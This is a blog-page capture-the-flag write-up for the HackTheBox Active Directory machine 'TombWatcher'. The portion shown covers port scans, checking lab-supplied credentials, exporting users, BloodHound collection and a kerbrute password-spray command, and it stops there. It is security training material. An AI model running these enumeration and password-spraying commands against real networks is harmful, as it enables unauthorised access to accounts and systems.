<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>TombWatcher | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/tombwatcher/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/tombwatcher/><link rel=prev href=https://h4r1337.github.io/posts/postman/><meta name=description content="TombWatcher is an assumed breach Active Directory machine. We will get initial credentials for user `henry` and from there we will go through a straight forward escalation path by analyzing bloodhound data. In the end we will stumble upon a deleted user whom we have write access on and who also have enroll access on an ESC15 vulnerable template. We will restore the user exploit ESC15 to gain domain admin access."><meta name=keywords content="AD,Assumed-Breach,adcs,Assumed-Breach,bloodyad,bloodhound,certipy,esc15,writespn,genericall,targeted-kerberoasting,add-self,deleted-object,ad-recycle-bin,read-gmsa-password,gmsadumper,windows,HackTheBox,htb-tombwatcher,forcechangepassword,writeowner,CVE-2024-49019,hashcat,passthehash,hashcracking,walkthgough,writeup,hacktehbox tombwatcher"><meta property="og:url" content="https://h4r1337.github.io/posts/tombwatcher/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="TombWatcher | HackTheBox"><meta property="og:description" content="TombWatcher is an assumed breach Active Directory machine. We will get initial credentials for user `henry` and from there we will go through a straight forward escalation path by analyzing bloodhound data. In the end we will stumble upon a deleted user whom we have write access on and who also have enroll access on an ESC15 vulnerable template. We will restore the user exploit ESC15 to gain domain admin access."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2026-06-28T21:18:49+05:30"><meta property="article:modified_time" content="2026-06-28T21:18:49+05:30"><meta property="article:tag" content="AD"><meta property="article:tag" content="Adcs"><meta property="article:tag" content="Assumed-Breach"><meta property="article:tag" content="Bloodyad"><meta property="article:tag" content="Bloodhound"><meta property="article:tag" content="Certipy"><meta property="og:image" content="https://h4r1337.github.io/img/tombwatcher/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/postman/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/trick/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/facts/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/jeeves/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/fluffy/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/tombwatcher/cover.webp"><meta name=twitter:title content="TombWatcher | HackTheBox"><meta name=twitter:description content="TombWatcher is an assumed breach Active Directory machine. We will get initial credentials for user `henry` and from there we will go through a straight forward escalation path by analyzing bloodhound data. In the end we will stumble upon a deleted user whom we have write access on and who also have enroll access on an ESC15 vulnerable template. We will restore the user exploit ESC15 to gain domain admin access."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.4e9051d9b14352f5f7ae64b91bb7e552a03ad7b9d27cbffac49ee91418235015.css integrity="sha256-TpBR2bFDUvX3rmS5G7flUqA617nSfL/6xJ7pFBgjUBU="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/ad/ class=tag>AD</a>
,
<a href=https://h4r1337.github.io/tags/adcs/ class=tag>ADCS</a>
,
<a href=https://h4r1337.github.io/tags/assumed-breach/ class=tag>ASSUMED-BREACH</a>
,
<a href=https://h4r1337.github.io/tags/bloodyad/ class=tag>BLOODYAD</a>
,
<a href=https://h4r1337.github.io/tags/bloodhound/ class=tag>BLOODHOUND</a>
,
<a href=https://h4r1337.github.io/tags/certipy/ class=tag>CERTIPY</a>
,
<a href=https://h4r1337.github.io/tags/esc15/ class=tag>ESC15</a>
,
<a href=https://h4r1337.github.io/tags/writespn/ class=tag>WRITESPN</a>
,
<a href=https://h4r1337.github.io/tags/genericall/ class=tag>GENERICALL</a>
,
<a href=https://h4r1337.github.io/tags/targeted-kerberoasting/ class=tag>TARGETED-KERBEROASTING</a>
,
<a href=https://h4r1337.github.io/tags/add-self/ class=tag>ADD-SELF</a>
,
<a href=https://h4r1337.github.io/tags/deleted-object/ class=tag>DELETED-OBJECT</a>
,
<a href=https://h4r1337.github.io/tags/ad-recycle-bin/ class=tag>AD-RECYCLE-BIN</a>
,
<a href=https://h4r1337.github.io/tags/read-gmsa-password/ class=tag>READ-GMSA-PASSWORD</a>
,
<a href=https://h4r1337.github.io/tags/gmsadumper/ class=tag>GMSADUMPER</a>
,
<a href=https://h4r1337.github.io/tags/windows/ class=tag>WINDOWS</a>
,
<a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/htb-tombwatcher/ class=tag>HTB-TOMBWATCHER</a>
,
<a href=https://h4r1337.github.io/tags/forcechangepassword/ class=tag>FORCECHANGEPASSWORD</a>
,
<a href=https://h4r1337.github.io/tags/writeowner/ class=tag>WRITEOWNER</a>
,
<a href=https://h4r1337.github.io/tags/cve-2024-49019/ class=tag>CVE-2024-49019</a>
,
<a href=https://h4r1337.github.io/tags/hashcat/ class=tag>HASHCAT</a>
,
<a href=https://h4r1337.github.io/tags/passthehash/ class=tag>PASSTHEHASH</a>
,
<a href=https://h4r1337.github.io/tags/hashcracking/ class=tag>HASHCRACKING</a></span></div><h1 class=header-title itemprop=headline>TombWatcher | HackTheBox</h1><div class=post-meta><time datetime="2026-06-28 21:18:49 +0530 +0530" itemprop=datePublished>2026-06-28
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2026-06-28 21:18:49 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>TombWatcher is an assumed breach Active Directory machine. We will get initial credentials for user `henry` and from there we will go through a straight forward escalation path by analyzing bloodhound data. In the end we will stumble upon a deleted user whom we have write access on and who also have enroll access on an ESC15 vulnerable template. We will restore the user exploit ESC15 to gain domain admin access.</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/tombwatcher/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/TombWatcher>TombWatcher</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Medium</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Windows</td></tr><tr><td style=text-align:center>Makers</td><td style=text-align:center><a href=https://app.hackthebox.com/users/2984><img src=https://www.hackthebox.com/badge/image/2984 alt style=display:unset></a> & <a href=https://app.hackthebox.com/users/206770><img src=https://www.hackthebox.com/badge/image/206770 alt style=display:unset></a></td></tr></tbody></table><br><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About TombWatcher</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>TombWatcher is an assumed breach Active Directory machine. We will get initial credentials for user <code>henry</code> and from there we will go through a straight forward escalation path by analyzing bloodhound data. In the end we will stumble upon a deleted user whom we have write access on and who also have enroll access on an ESC15 vulnerable template. We will restore the user exploit ESC15 to gain domain admin access.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><hr><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p- --min-rate <span style=color:#d3869b>10000</span> -vv $IP -oA recon/nmap/ports
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.129.232.167
</span></span><span style=display:flex><span>Host is up, received syn-ack <span style=color:#fe8019>(</span>0.26s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>65515</span> filtered tcp ports <span style=color:#fe8019>(</span>no-response<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>PORT      STATE SERVICE          REASON
</span></span><span style=display:flex><span>53/tcp    open  domain           syn-ack
</span></span><span style=display:flex><span>80/tcp    open  http             syn-ack
</span></span><span style=display:flex><span>88/tcp    open  kerberos-sec     syn-ack
</span></span><span style=display:flex><span>135/tcp   open  msrpc            syn-ack
</span></span><span style=display:flex><span>139/tcp   open  netbios-ssn      syn-ack
</span></span><span style=display:flex><span>389/tcp   open  ldap             syn-ack
</span></span><span style=display:flex><span>445/tcp   open  microsoft-ds     syn-ack
</span></span><span style=display:flex><span>464/tcp   open  kpasswd5         syn-ack
</span></span><span style=display:flex><span>593/tcp   open  http-rpc-epmap   syn-ack
</span></span><span style=display:flex><span>636/tcp   open  ldapssl          syn-ack
</span></span><span style=display:flex><span>3268/tcp  open  globalcatLDAP    syn-ack
</span></span><span style=display:flex><span>3269/tcp  open  globalcatLDAPssl syn-ack
</span></span><span style=display:flex><span>5985/tcp  open  wsman            syn-ack
</span></span><span style=display:flex><span>9389/tcp  open  adws             syn-ack
</span></span><span style=display:flex><span>49666/tcp open  unknown          syn-ack
</span></span><span style=display:flex><span>49693/tcp open  unknown          syn-ack
</span></span><span style=display:flex><span>49694/tcp open  unknown          syn-ack
</span></span><span style=display:flex><span>49696/tcp open  unknown          syn-ack
</span></span><span style=display:flex><span>49716/tcp open  unknown          syn-ack
</span></span><span style=display:flex><span>62287/tcp open  unknown          syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sC -sV --min-rate <span style=color:#d3869b>10000</span> $IP -oA recon/nmap/service
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.129.232.167
</span></span><span style=display:flex><span>Host is up, received syn-ack <span style=color:#fe8019>(</span>0.23s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Scanned at 2026-06-27 23:36:57 IST <span style=color:#fe8019>for</span> 102s
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT     STATE    SERVICE       REASON      VERSION
</span></span><span style=display:flex><span>53/tcp   open     domain        syn-ack     Simple DNS Plus
</span></span><span style=display:flex><span>80/tcp   filtered http          no-response
</span></span><span style=display:flex><span>88/tcp   open     kerberos-sec  syn-ack     Microsoft Windows Kerberos <span style=color:#fe8019>(</span>server time: 2026-06-27 22:12:19Z<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>135/tcp  open     msrpc         syn-ack     Microsoft Windows RPC
</span></span><span style=display:flex><span>139/tcp  open     netbios-ssn   syn-ack     Microsoft Windows netbios-ssn
</span></span><span style=display:flex><span>389/tcp  open     ldap          syn-ack     Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: tombwatcher.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>| ssl-cert: Subject: commonName<span style=color:#fe8019>=</span>DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>tombwatcher-CA-1/domainComponent<span style=color:#fe8019>=</span>tombwatcher
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha1WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2024-11-16T00:47:59
</span></span><span style=display:flex><span>| Not valid after:  2025-11-16T00:47:59
</span></span><span style=display:flex><span>| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae <span style=color:#d3869b>0666</span>
</span></span><span style=display:flex><span>| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e <span style=color:#d3869b>4234</span> ef9c
</span></span><span style=display:flex><span>| SHA-256: <span style=color:#d3869b>5128</span> aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a <span style=color:#d3869b>0440</span> 85bd f5d6 <span style=color:#d3869b>2734</span> 6ea9
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIF9jCCBN6gAwIBAgITLgAAAAKKaXDNTUaJbgAAAAAAAjANBgkqhkiG9w0BAQUF
</span></span><span style=display:flex><span>| ADBNMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLdG9tYndh
</span></span><span style=display:flex><span>&lt;--------------- SNIP ----------------&gt;
</span></span><span style=display:flex><span>| UVh/6C+B68hnPsCF3DZFpO80im6G311u4izntBMGqxIhnIAVYFlR2H+HlFS+J0zo
</span></span><span style=display:flex><span>| x4qtaXNNmuaDW26OOtTf3FgylWUe5ji5MIq5UEupdOAI/xdwWV5M4gWFWZwNpSXG
</span></span><span style=display:flex><span>| Xq2engKcrfy4900Q10HektLKjyuhvSdWuyDwGW1L34ZljqsDsqV1S0SE
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>|_ssl-date: 2026-06-27T22:13:50+00:00; +4h05m14s from scanner time.
</span></span><span style=display:flex><span>445/tcp  open     microsoft-ds? syn-ack
</span></span><span style=display:flex><span>464/tcp  open     kpasswd5?     syn-ack
</span></span><span style=display:flex><span>593/tcp  open     ncacn_http    syn-ack     Microsoft Windows RPC over HTTP 1.0
</span></span><span style=display:flex><span>636/tcp  filtered ldapssl       no-response
</span></span><span style=display:flex><span>3268/tcp open     ldap          syn-ack     Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: tombwatcher.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_ssl-date: 2026-06-27T22:13:50+00:00; +4h05m14s from scanner time.
</span></span><span style=display:flex><span>| ssl-cert: Subject: commonName<span style=color:#fe8019>=</span>DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>tombwatcher-CA-1/domainComponent<span style=color:#fe8019>=</span>tombwatcher
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha1WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2024-11-16T00:47:59
</span></span><span style=display:flex><span>| Not valid after:  2025-11-16T00:47:59
</span></span><span style=display:flex><span>| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae <span style=color:#d3869b>0666</span>
</span></span><span style=display:flex><span>| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e <span style=color:#d3869b>4234</span> ef9c
</span></span><span style=display:flex><span>| SHA-256: <span style=color:#d3869b>5128</span> aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a <span style=color:#d3869b>0440</span> 85bd f5d6 <span style=color:#d3869b>2734</span> 6ea9
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIF9jCCBN6gAwIBAgITLgAAAAKKaXDNTUaJbgAAAAAAAjANBgkqhkiG9w0BAQUF
</span></span><span style=display:flex><span>| ADBNMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLdG9tYndh
</span></span><span style=display:flex><span>&lt;--------------- SNIP ----------------&gt;
</span></span><span style=display:flex><span>| UVh/6C+B68hnPsCF3DZFpO80im6G311u4izntBMGqxIhnIAVYFlR2H+HlFS+J0zo
</span></span><span style=display:flex><span>| x4qtaXNNmuaDW26OOtTf3FgylWUe5ji5MIq5UEupdOAI/xdwWV5M4gWFWZwNpSXG
</span></span><span style=display:flex><span>| Xq2engKcrfy4900Q10HektLKjyuhvSdWuyDwGW1L34ZljqsDsqV1S0SE
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>3269/tcp open     ssl/ldap      syn-ack     Microsoft Windows Active Directory LDAP <span style=color:#fe8019>(</span>Domain: tombwatcher.htb, Site: Default-First-Site-Name<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_ssl-date: 2026-06-27T22:13:50+00:00; +4h05m15s from scanner time.
</span></span><span style=display:flex><span>| ssl-cert: Subject: commonName<span style=color:#fe8019>=</span>DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.tombwatcher.htb
</span></span><span style=display:flex><span>| Issuer: commonName<span style=color:#fe8019>=</span>tombwatcher-CA-1/domainComponent<span style=color:#fe8019>=</span>tombwatcher
</span></span><span style=display:flex><span>| Public Key type: rsa
</span></span><span style=display:flex><span>| Public Key bits: <span style=color:#d3869b>2048</span>
</span></span><span style=display:flex><span>| Signature Algorithm: sha1WithRSAEncryption
</span></span><span style=display:flex><span>| Not valid before: 2024-11-16T00:47:59
</span></span><span style=display:flex><span>| Not valid after:  2025-11-16T00:47:59
</span></span><span style=display:flex><span>| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae <span style=color:#d3869b>0666</span>
</span></span><span style=display:flex><span>| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e <span style=color:#d3869b>4234</span> ef9c
</span></span><span style=display:flex><span>| SHA-256: <span style=color:#d3869b>5128</span> aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a <span style=color:#d3869b>0440</span> 85bd f5d6 <span style=color:#d3869b>2734</span> 6ea9
</span></span><span style=display:flex><span>| -----BEGIN CERTIFICATE-----
</span></span><span style=display:flex><span>| MIIF9jCCBN6gAwIBAgITLgAAAAKKaXDNTUaJbgAAAAAAAjANBgkqhkiG9w0BAQUF
</span></span><span style=display:flex><span>| ADBNMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLdG9tYndh
</span></span><span style=display:flex><span>&lt;--------------- SNIP ----------------&gt;
</span></span><span style=display:flex><span>| UVh/6C+B68hnPsCF3DZFpO80im6G311u4izntBMGqxIhnIAVYFlR2H+HlFS+J0zo
</span></span><span style=display:flex><span>| x4qtaXNNmuaDW26OOtTf3FgylWUe5ji5MIq5UEupdOAI/xdwWV5M4gWFWZwNpSXG
</span></span><span style=display:flex><span>| Xq2engKcrfy4900Q10HektLKjyuhvSdWuyDwGW1L34ZljqsDsqV1S0SE
</span></span><span style=display:flex><span>|_-----END CERTIFICATE-----
</span></span><span style=display:flex><span>5985/tcp filtered wsman         no-response
</span></span><span style=display:flex><span>9389/tcp open     mc-nmf        syn-ack     .NET Message Framing
</span></span><span style=display:flex><span>Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Host script results:
</span></span><span style=display:flex><span>| smb2-time: 
</span></span><span style=display:flex><span>|   date: 2026-06-27T22:13:11
</span></span><span style=display:flex><span>|_  start_date: N/A
</span></span><span style=display:flex><span>| smb2-security-mode: 
</span></span><span style=display:flex><span>|   3.1.1: 
</span></span><span style=display:flex><span>|_    Message signing enabled and required
</span></span><span style=display:flex><span>| p2p-conficker: 
</span></span><span style=display:flex><span>|   Checking <span style=color:#fe8019>for</span> Conficker.C or higher...
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>1</span> <span style=color:#fe8019>(</span>port 52925/tcp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>2</span> <span style=color:#fe8019>(</span>port 40660/tcp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>3</span> <span style=color:#fe8019>(</span>port 60904/udp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|   Check <span style=color:#d3869b>4</span> <span style=color:#fe8019>(</span>port 33558/udp<span style=color:#fe8019>)</span>: CLEAN <span style=color:#fe8019>(</span>Timeout<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_  0/4 checks are positive: Host is CLEAN or ports are blocked
</span></span><span style=display:flex><span>|_clock-skew: mean: 4h05m14s, deviation: 0s, median: 4h05m13s
</span></span></code></pre></div><p>Since this is an AD assumed breach scenario we have initial credentials to work with.</p><blockquote><p>As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!</p></blockquote><p>Let&rsquo;s verify the credentials and generate hosts file using <code>nxc</code> (two birds with one command):</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>sudo nxc smb $IP -u henry -p <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> --generate-hosts-file /etc/hosts
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260627234733.webp></figure><p>The credentials are working.</p><hr><h2 id=enumeration><a href=#enumeration class=anchor-head aria-label=Anchor></a>Enumeration</h2><h3 id=smb><a href=#smb class=anchor-head aria-label=Anchor></a>SMB</h3><p>Checking if we have access on any interesting shares.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb tombwatcher.htb -u henry -p <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> --shares
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260627235415.webp></figure><p>Nothing useful. I exported list of users available:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>nxc smb tombwatcher.htb -u henry -p <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> --users-export users.txt
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260628163530.webp></figure><h3 id=rusthound><a href=#rusthound class=anchor-head aria-label=Anchor></a>Rusthound</h3><p>I used <a href=https://github.com/g0h4n/RustHound-CE><code>rusthound</code></a> for collecting bloodhound data:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>rusthound-ce -d tombwatcher.htb -u <span style=color:#b8bb26>&#39;henry&#39;</span> -p <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span> --zip
</span></span></code></pre></div><figure><img src=/img/tombwatcher/Pasted%20image%2020260627235511.webp></figure><h3 id=password-spray><a href=#password-spray class=anchor-head aria-label=Anchor></a>Password spray</h3><p>We can do a password spray attack with the password we have and the available users:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-sh data-lang=sh><span style=display:flex><span>faketime -f <span style=color:#b8bb26>&#39;+4.05h&#39;</span> kerbrute passwordspray --dc DC01.tombwatcher.htb -d tombwatcher.htb users.txt <span style=color:#b8bb26>&#39;H3nry_987TGV!&#39;</span>
